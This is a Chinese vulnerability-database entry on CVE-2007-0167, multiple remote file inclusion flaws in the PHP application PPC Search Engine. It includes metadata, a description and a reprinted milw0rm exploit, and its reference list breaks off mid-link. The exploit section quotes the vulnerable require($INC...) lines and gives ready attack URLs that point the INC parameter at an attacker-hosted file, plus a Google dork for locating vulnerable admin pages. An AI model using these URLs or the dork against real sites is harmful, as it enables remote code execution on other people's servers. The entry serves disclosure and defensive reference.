PPC Search Engine INC Parameter 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111982 漏洞类型 输入验证
发布时间 2007-01-09 更新时间 2007-01-10
CVE编号 CVE-2007-0167 CNNVD-ID CNNVD-200701-083
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3104
https://cxsecurity.com/issue/WLB-2007010051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-083
|漏洞详情
当和其他别名一起被分区时,WGS-PPC(又称PPC搜索引擎)中存在多个PHP文件包含漏洞。远程攻击者可以借助INC参数中的一个URL,执行任意的PHP代码。该INC参数是提交到config/中的(1)config_admin.php,(2)config_main.php,(3)config_member.php和(4)mysql_config.php;admini/中的(5)admin.php和(6)index.php;(7)paypalipn/ipnprocess.php;members/中的(8)index.php和(9)registration.php以及(10)ppcbannerclick.php和(11)ppcclick.php的参数。
|漏洞EXP
============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# script demo: http://www.hyper-scripts.com/demo/ppc/
# Risk          : very danger
# Thanks To  : all #hitamputih crew
# special To  : str0ke@milw0rm.com,akukasih,nyubi,irvian,BlueSpy
[[SQL]]]---------------------------------------------------------
on dir config
file config_admin.php
================
require($INC."functions/functions_admin.php");

// require($INC."functions/functions_payment.php");

require($INC."config/admin_pw.php");

require($INC."config/config_member.php");




file config_main.php

require($INC."config/site_url.php");

require($INC."config/mysql_config.php");

require($INC."functions/functions_main.php");

require($INC."functions/external_results.php");



file config_member.php
=================

require($INC."functions/functions_member.php");

require($INC."functions/functions_payment.php");




file mysql_config.php
===============
require($INC."functions/db_functions.php");

require($INC."config/db_info.php");

explot :
http://target.lu/path/config/config_admin.php?INC=http://injekan.lu?
http://target.lu/path/config/config_main.php?INC=http://injekan.lu?
http://target.lu/path/config/config_member.php?INC=http://injekan.lu?
http://target.lu/path/config/mysql_config.php?INC=http://injekan.lu?


on dir admini

file admin.php
===========

require($INC."config/config_main.php");

require($INC."config/config_admin.php");

require($INC."functions/functions_bu_and_reports.php");

require($INC."config/dbstructure.php");

file index.php
============
require("path.php");
require($INC."config/config_main.php");
require($INC."config/config_admin.php");

exploit :

http://target.lu/path/admini/admin.php?INC=http://injekan.lu?
http://target.lu/path/admini/index.php?INC=http://injekan.lu?

on dir paypalipn
file ipnprocess.php

require($INC."config/config_main.php");
require($INC."functions/functions_payment.php");

exploit :

http://target.lu/path/paypalipn/ipnprocess.php?INC=http://injekan.lu?

on dir members

require($INC."config/config_main.php");
require($INC."config/config_member.php");
require($INC."functions/functions_bu_and_reports.php");

exploit :

http://target.lu/path/members/index.php?INC=http://injekan.lu?
http://target.lu/path/members/registration.php?INC=http://injekan.lu?

on dir main
file index.php
require("path.php");
require($INC."config/config_main.php");
require($INC."config/config_main2.php");
require($INC."functions/functions_search.php");
mysql_connect ($DBHost, $DBLogin, $DBPassword);

file ppcbannerclick.php and ppcclick.php

require("path.php");
require($INC."config/config_main.php");

exploit :

http://target.lu/path/main/ppcbannerclick.php?INC=http://injekan.lu?
http://target.lu/path/main/ppcclick.php?INC=http://injekan.lu?

google dork : intitle:"ppc engine admin login form"
=======================================================

# milw0rm.com [2007-01-09]
|参考资料

来源:BID
名称:21961
链接:http://www.securityfocus.com/bid/21961
来源:BUGTRAQ
名称:20070109ppcengineMultiplefileinclusion
链接:http://www.securityfocus.com/archive/1/archive/1/456386/100/0/threaded
来源:VIM
名称:20070109"ppcengine"isWGS-PPC
链接:http://www.attrition.org/pipermail/vim/2007-January/001221.html
来源:XF
名称:demoppc-inc-file-include(31355)
链接:http://xforce.iss.net/xforce/xfdb/31355
来源:OSVDB
名称:33454
链接:http://www.osvdb.org/33454
来源:OSVDB
名称:33453
链接:http://www.osvdb.org/33453
来源:OSVDB
名称:33452
链接:http://www.osvdb.org/33452
来源:OSVDB
名称:33451
链接:http://www.osvdb.org/33451
来源:OSVDB
名称:33450
链接:http://www.osvdb.org/33450
来源:OSVDB
名称:33449
链接:http://www.osvdb.org/33449
来源:OSVDB
名称:33448
链接:http://www.osvdb.org/33448
来源:OSVDB
名称:33447
链接:http://www.osvdb.org/33447
来源:OSVDB
名称:33446
链接:http://www.osvdb.org/33446
来源:OSVDB
名称:33445
链接:http://www.osvdb.org/33445
来源:OSVDB
名称:33444
链接:http://www.osvdb.org/33444
来源:MILW0RM
名称:3104
链接:http://www.milw0rm.com/exploits/3104
来源:SREASON
名称:2134
链接:http://security